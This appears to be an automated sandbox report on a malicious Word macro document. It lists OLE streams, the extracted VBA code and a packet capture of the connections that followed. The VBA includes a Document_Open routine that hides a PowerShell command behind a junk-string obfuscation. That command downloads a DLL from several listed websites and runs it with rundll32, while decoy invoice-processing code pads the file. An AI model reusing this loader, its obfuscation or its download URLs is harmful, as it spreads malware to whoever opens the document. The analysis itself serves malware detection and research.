Stream Path:	VBA/bvkaeiku2ncoi2uho3ihdes
VBA File Name:	bvkaeiku2ncoi2uho3ihdes.cls
Stream Size:	9859
Data ASCII:	. . . . . . . . . ^ . . . . . . . . . . . . . . . j . . . b . . . . . . . . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 01 f0 00 00 00 5e 07 00 00 d4 00 00 00 02 02 00 00 ff ff ff ff 6a 07 00 00 62 19 00 00 00 00 00 00 01 00 00 00 ea eb ff 49 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "bvkaeiku2ncoi2uho3ihdes"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub tgkauegriu3gkaiusdgfaig3eirgaoiw3rgfoaisdgefig()
    On Error Resume Next: Err.Clear
    InvoiceFolder$ = GetFolder(1, , "(look)")
    If InvoiceFolder$ = "" Then MsgBox "", vbCritical, "": Exit Sub
    ArchieveFolder$ = GetFolder(2, , ",")
    If ArchieveFolder$ = "" Then MsgBox ",", vbCritical, ",": Exit Sub
    Dim coll As Collection
    Set coll = FilenamesCollection(InvoiceFolder$, "?????? ?*??*.xls*", 1)
    If coll.Count = 0 Then
        MsgBox "" & vbNewLine & InvoiceFolder$, vbExclamation, ""
        Exit Sub
    End If
    Dim pi As New ProgressIndicator: pi.Show "", , 2
    pi.StartNewAction , , , , , coll.Count
    Dim WB As Workbook, sh As Worksheet, ra As Range
    Application.ScreenUpdating = False
    For Each FileName In coll
        pi.SubAction "$index $count", ":" & Dir(FileName), "$time"
        pi.Log ":" & Dir(FileName)
        Set WB = Nothing: Set WB = Workbooks.Open(FileName, False, True)
        If WB Is Nothing Then
            pi.Log vbTab & "."
        Else
            Set sh = WB.Worksheets(1)
            Set ra = sh.Range(sh.Range("b1"), sh.Range("b" & sh.Rows.Count).End(xlUp))
            shb.Range("a" & shb.Rows.Count).End(xlUp).Offset(1).Resize(, ra.Rows.Count).Value =             Application.WorksheetFunction.Transpose(ra.Value)
            WB.Close False: DoEvents
            pi.Log vbTab & "."
            Name FileName As ArchieveFolder$ & Dir(FileName, vbNormal)
        End If
    Next
    pi.Hide: DoEvents: Application.ScreenUpdating = True
    MsgBox "", vbInformation
End Sub
Sub gdekkefh32yeyf8tasf8gqw8dgfiaxdbaflpo3pt23hf()
    On Error Resume Next: Err.Clear
    folder_1$ = GetFolder(1, , "")
    If folder_1$ = "" Then Exit Sub
    folder_2$ = GetFolder(2, , , folder_1$)
    If folder_2$ = "" Then Exit Sub
    folder_3$ = GetFolder(, True, "")
    If folder_3$ = "" Then Exit Sub
End Sub
Sub dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf(nfkl34 As String, ndr54 As Long, bvret As Long)
    Dim s1, s2, ra, glew, hkqwfsadesf, st As String
    Dim d, R As Double
    s2 = "DaIcDaImd.DaIeDaIxe DaI/DaIc sDaItaDaIrt /DaIB poDaIwDaIerDaIshDaIelDaIl $dDaIfkj=""$DaIstDaIrs=\""hDaItDaItp:DaI/DaI/thepilaDaItesstudionj.cDaIom/DaIwp-contDaIent/oAx5UoQmIX3cbw/,hDaItDaItp:DaI/DaI/alfaoDaIfarms.coDaIm/xcyav/F9le301G89W0s2g4jLO5/,htDaItpDaIs:DaI/DaI/stDaIaviancjs.cDaIom/wpDaI-foDaIrum/QOm4n2/,DaIhtDaItpDaIs:DaI/DaI/yougaDaIndan.cDaIom/bacDaIkup_YDaIouGaDaIndan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,htDaItDaIp:DaI/DaI/alfadaDaIndoinc.cDaIom/67oyp/C2J2KyCpQnkK4Um/,hDaItDaItp:DaI/DaI/wDaIwDaIw.caboDaIturnup.cDaIom/wDaIp-contDaIent/pluDaIgins/clDaIassic-edDaIitor/js/PZgllRH6QtkaCKtSB50rzr/,htDaItDaIp:/DaI/iDaItoDaImsysDaItem.iDaIn/i9eg3y/nNxmmn9aTcv/\"".SDaIplDaIit(\""DaI,DaI\"");fDaIoDaIreacDaIh($DaIst iDaIn "
    Dim fs As Integer
    Set service = CreateObject("Wsc" + s1 + "ript.She" & "ll")
    s2 = s2 + "$DaIstrDaIs){DaI$r1=GDaIet-RDaIandDaIom;$DaIr2=GDaIeDaIt-RDaIandDaIom;DaI$tpDaIth=\""DaICDaI:DaI\PDaIroDaIgramDDaIata\\\""+DaI$rDaI1+\"".DaIdDaIll\""DaI;IDaInDaIvoDaIke-WDaIebDaIReDaIqueDaIst -DaIUrDaIi $sDaIt -ODaIutFDaIilDaIe $tptDaIh;iDaIf(TDaIeDaIst-DaIPatDaIh DaI$tpDaIth){$DaIfDaIp=DaI\""DaIC:DaI\DaIWiDaIndDaIowDaIs\SDaIysDaIWDaIow6DaI4\rDaIuDaIndlDaIl3DaI2.eDaIxDaIe\"";$DaIa=DaI$tDaIptDaIh+DaI\"",DaIf\""+DaI$DaIr2;SDaItDaIaDaIrt-DaIProcDaIess $fDaIp -DaIArgDaIumeDaIntLDaIist DaI$aDaI;bDaIrDaIeak;}};"";DaIIEXDaI $dDaIfkj"
    If d <> 0.123456 Then
    ra = Replace(s2, "DaI", "")
    End If
    service.Run ra, 0
End Sub
Sub fhowi34hotaildovgjuspozao3ethao4wthihegf()
    folder$ = GetFolder()
    If folder$ = "" Then Exit Sub
    MsgBox ":" & folder$, vbInformation
End Sub
Private Sub Document_Open()
    Dim dfjrqlwihjpqwof As String
    dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf "sd", 0, 0
    If fojn = "afqowihro3ihoqew df" Then
        fjl = "gks; kr4;"
        MsgBox fjl
    End If
End Sub
Sub dgfhoswihetaoihegaosoaihcbi()
    On Error Resume Next: GetFolder , True
End Sub
Function bcbcmbvbvch3h2yg3u5i4tyirugiu(Optional ByVal FolderIndex& = 0, Optional ByVal ShowDialog As Boolean = False, Optional ByVal Title$ = "", Optional ByVal InitialFolder$) As String
    On Error Resume Next: Err.Clear
    ProjectName$ = IIf(Len(PROJECT_NAME$) > 0, PROJECT_NAME$, ",")
    PreviousFolder$ = GetSetting(Application.Name, ProjectName$, "folder" & FolderIndex&, "")
    If Len(PreviousFolder$) > 0 And Not ShowDialog Then
        If Dir(PreviousFolder$, vbDirectory) <> "" Then GetFolder = PreviousFolder$: Exit Function
    End If
    If InitialFolder$ = "" Then
        If Len(PreviousFolder$) > 0 And Dir(PreviousFolder$, vbDirectory) <> "" Then
            InitialFolder$ = PreviousFolder$
        Else
            InitialFolder$ = ThisWorkbook.Path & "\"
        End If
    End If
    With Application.FileDialog(msoFileDialogFolderPicker)
        .ButtonName = "": .Title = Title: .InitialFileName = InitialFolder$
        If .Show <> -1 Then Exit Function
        GetFolder = .SelectedItems(1)
        If Not Right$(GetFolder, 1) = "\" Then GetFolder = GetFolder & "\"
        SaveSetting Application.Name, ProjectName$, "folder" & FolderIndex&, GetFolder
    End With
End Function

Streams

Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 521

General
Stream Path:	PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	521
Entropy:	5.22231541281
Base64 Encoded:	True
Data ASCII:	I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = b v k a e i k u 2 n c o i 2 u h o 3 i h d e s / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . H e l p F i l e = " " . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 5 F 5 D F 3 5 6 0 D E A 6 8 E E 6 8 E E 6 C F 2 6 C F 2 " . . D
Data Raw:	49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 62 76 6b 61 65 69 6b 75 32 6e 63 6f 69 32 75 68 6f 33 69 68 64 65 73 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30

Stream Path: PROJECTwm, File Type: data, Stream Size: 74

General
Stream Path:	PROJECTwm
File Type:	data
Stream Size:	74
Entropy:	3.31599778695
Base64 Encoded:	False
Data ASCII:	b v k a e i k u 2 n c o i 2 u h o 3 i h d e s . b . v . k . a . e . i . k . u . 2 . n . c . o . i . 2 . u . h . o . 3 . i . h . d . e . s . . . . .
Data Raw:	62 76 6b 61 65 69 6b 75 32 6e 63 6f 69 32 75 68 6f 33 69 68 64 65 73 00 62 00 76 00 6b 00 61 00 65 00 69 00 6b 00 75 00 32 00 6e 00 63 00 6f 00 69 00 32 00 75 00 68 00 6f 00 33 00 69 00 68 00 64 00 65 00 73 00 00 00 00 00

Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4778

General
Stream Path:	VBA/_VBA_PROJECT
File Type:	data
Stream Size:	4778
Entropy:	4.85191198027
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
Data Raw:	cc 61 88 00 00 01 00 ff 19 04 00 00 09 04 00 00 e3 04 01 00 00 00 00 00 00 00 00 00 01 00 07 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00

Stream Path: VBA/dir, File Type: data, Stream Size: 841

General
Stream Path:	VBA/dir
File Type:	data
Stream Size:	841
Entropy:	6.48895457492
Base64 Encoded:	True
Data ASCII:	. E . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . o . . c . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . . N c .
Data Raw:	01 45 b3 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 6f c3 8b 63 06 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 22, 2021 11:01:44.473294020 CET	49752	80	192.168.2.5	72.167.40.83
Nov 22, 2021 11:01:44.639899969 CET	80	49752	72.167.40.83	192.168.2.5
Nov 22, 2021 11:01:44.641463041 CET	49752	80	192.168.2.5	72.167.40.83
Nov 22, 2021 11:01:44.759536028 CET	49752	80	192.168.2.5	72.167.40.83
Nov 22, 2021 11:01:44.930659056 CET	80	49752	72.167.40.83	192.168.2.5
Nov 22, 2021 11:01:44.974144936 CET	80	49752	72.167.40.83	192.168.2.5
Nov 22, 2021 11:01:44.979284048 CET	80	49752	72.167.40.83	192.168.2.5
Nov 22, 2021 11:01:44.979330063 CET	80	49752	72.167.40.83	192.168.2.5
Nov 22, 2021 11:01:44.979474068 CET	49752	80	192.168.2.5	72.167.40.83
Nov 22, 2021 11:01:44.979598045 CET	49752	80	192.168.2.5	72.167.40.83
Nov 22, 2021 11:01:45.145000935 CET	80	49752	72.167.40.83	192.168.2.5
Nov 22, 2021 11:01:48.144756079 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:48.309940100 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.312969923 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:48.313236952 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:48.478471041 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.488010883 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.488051891 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.488082886 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.488152027 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.488194942 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:48.488244057 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:48.488785028 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.488817930 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.488864899 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.488902092 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.488929033 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:48.488956928 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.488981962 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:48.489039898 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.489113092 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:48.655143023 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.655184031 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.655213118 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.655240059 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.655267954 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.655292988 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.655293941 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:48.655328035 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:48.655350924 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:48.655405045 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.655435085 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.655462027 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.655488968 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.655493975 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:48.655517101 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.655544996 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.655574083 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:48.655605078 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:48.822607040 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.822638035 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.822658062 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.822676897 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.822695017 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.822715044 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.822757959 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.822772980 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:48.822822094 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:48.822840929 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.822863102 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.822882891 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.822902918 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.822920084 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:48.822921991 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.822968006 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:48.822972059 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:48.823007107 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.823026896 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.823087931 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:48.823143005 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.823164940 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.823184013 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.823204994 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.823230028 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:48.823252916 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:48.997756958 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.997827053 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.997878075 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.997889996 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:48.997930050 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.997981071 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.998045921 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:48.998317957 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.998375893 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.998409033 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:48.998429060 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.998480082 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.998481989 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:48.998531103 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.998694897 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:48.998759031 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.998814106 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.998864889 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.998881102 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:48.998919964 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.998969078 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.999028921 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:48.999269962 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.999324083 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.999375105 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.999396086 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:48.999427080 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.999434948 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:48.999480009 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.999532938 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.999582052 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.999593973 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:48.999634981 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.999686956 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.999691010 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:48.999736071 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:48.999789953 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:49.000478029 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.002811909 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:49.164994955 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.165064096 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.165117979 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.165169001 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.165220976 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.165240049 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:49.165277958 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.165329933 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:49.165373087 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:49.165378094 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.165431976 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.165484905 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.165534019 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.165534973 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:49.165585041 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:49.165591955 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.165647984 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.165698051 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.165714979 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:49.165749073 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.165801048 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.165848017 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:49.165851116 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.165911913 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.165940046 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:49.165961027 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.166011095 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.166059971 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.166062117 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:49.166110039 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.166150093 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:49.166160107 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.166212082 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.166235924 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:49.166263103 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.166315079 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.166363001 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.166393042 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:49.166414022 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.166464090 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.166466951 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:49.166512966 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.166541100 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:49.166565895 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.166615009 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.166666031 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.166670084 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:49.166716099 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.166718006 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:49.166764021 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.166815996 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.166852951 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:49.166866064 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.166914940 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.166935921 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:49.167871952 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.167926073 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.167993069 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:49.334682941 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.334708929 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.334729910 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.334752083 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.334781885 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.334803104 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.334816933 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:49.334824085 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.334844112 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.335001945 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:49.337202072 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.337224007 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.337260962 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.337407112 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.337413073 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:49.337430000 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.337451935 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.337466955 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:49.337475061 CET	80	49753	50.62.141.15	192.168.2.5
